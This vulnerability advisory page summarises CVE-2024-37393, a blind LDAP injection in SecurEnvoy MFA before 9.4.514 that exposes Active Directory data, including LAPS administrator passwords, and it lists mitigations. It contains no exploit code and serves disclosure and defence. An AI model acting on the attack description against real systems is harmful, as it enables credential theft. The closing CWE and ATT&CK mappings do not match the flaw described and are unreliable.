CVE-2024-37393 in MFA
Summary
by MITRE • 06/10/2024
Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.
VulDB is the best source for vulnerability data and more expert information about this specific topic.
Analysis
by VulDB Data Team • 06/13/2024
The vulnerability identified as CVE-2024-37393 represents a critical security flaw in SecurEnvoy Multi-Factor Authentication (MFA) software versions prior to 9.4.514. This issue stems from inadequate input validation mechanisms within the DESKTOP service component, which exposes a sensitive HTTP endpoint at /secserver. The vulnerability manifests as multiple LDAP injection flaws that can be exploited by unauthenticated remote attackers to gain unauthorized access to Active Directory data. The flaw specifically affects the authentication and authorization processes of the SecurEnvoy platform, creating a significant attack surface that adversaries can leverage to extract sensitive information from enterprise environments.
The technical implementation of this vulnerability involves blind LDAP injection attacks that exploit the improper sanitization of user-supplied input within the DESKTOP service. When the service processes requests through the /secserver endpoint, it fails to properly validate or escape input parameters that are subsequently used in LDAP queries. This allows attackers to craft malicious LDAP filter expressions that can traverse the directory structure and extract information from Active Directory. The blind nature of the injection means that attackers cannot directly observe query results, but can infer information through timing attacks or by constructing queries that produce different responses based on the data they attempt to access.
The operational impact of this vulnerability is particularly severe for organizations relying on SecurEnvoy for MFA solutions, as it provides attackers with access to potentially sensitive credentials stored in Active Directory. The most concerning aspect involves the extraction of ms-Mcs-AdmPwd attributes, which contain cleartext passwords for the Local Administrator Password Solution (LAPS) feature. This creates a direct pathway for attackers to obtain administrative credentials that can be used to compromise entire domain environments. The vulnerability affects organizations that have not updated to SecurEnvoy version 9.4.514 or later, leaving them exposed to potential credential theft and lateral movement attacks. The unauthenticated nature of the exploit means that attackers do not require valid credentials to initiate the attack, making it particularly dangerous for exposed services.
Security mitigation strategies should focus on immediate patching of SecurEnvoy installations to version 9.4.514 or later, which contains the necessary input validation fixes. Organizations should also implement network segmentation to restrict access to the /secserver endpoint and consider deploying intrusion detection systems to monitor for suspicious LDAP query patterns. The vulnerability aligns with CWE-94, which describes improper control of generation of code, and relates to ATT&CK technique T1078.004 for valid accounts and T1566.001 for spearphishing attachments, as the attack chain typically involves initial reconnaissance and exploitation of exposed services. Additional defensive measures include implementing strict LDAP query filtering, monitoring Active Directory for unusual query patterns, and conducting regular security assessments of exposed services to identify similar vulnerabilities in other components of the authentication infrastructure.